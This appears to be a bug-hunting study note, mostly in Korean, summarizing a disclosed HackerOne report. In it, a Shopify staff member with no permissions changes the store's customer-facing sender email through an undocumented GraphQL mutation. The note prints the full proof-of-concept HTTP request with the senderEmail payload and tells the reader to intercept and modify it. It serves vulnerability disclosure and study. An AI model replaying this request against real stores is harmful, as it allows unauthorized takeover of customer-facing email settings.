hackerone-shopify-2020-10-m-980511
A staff member with no permissions can edit Store Customer Email
권한이 없는 직원이 고객에게 보일 상점의 이메일을 수정할 수 있었다. emailSenderConfigurationUpdate 는 문서화되지 않은 GraphQL API로, 취약점이 있는 API다. 이는 general setting 에서 트리거할 수 있다.
POST /admin/internal/web/graphql/core HTTP/1.1
Cookie: [REDACTED]
accept: application/json
X-CSRF-Token: [REDACTED]
Content-Type: application/json
User-Agent: PostmanRuntime/7.26.5
Postman-Token: 082760e7-3dac-481e-8741-50cb2cc61617
Host: [YOUR-DOMAIN].myshopify.com
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 346
{"query":"\r\nmutation emailSenderConfigurationUpdate ($input:EmailSenderConfigurationUpdateInput!){ emailSenderConfigurationUpdate(input:$input) {\r\n emailSenderConfiguration{\r\n id\r\n }\r\n\r\nuserErrors {\r\n field\r\n message\r\n}\r\n}\r\n}","variables":{
"input":{
"senderEmail":"███"
}
}}패킷을 잡아 senderEmail을 원하는 메일로 지정한다.
tags: bughunting, shopify, access control vulnerability, wstg-athz-03, wstg-info-06, severity medium, web hacking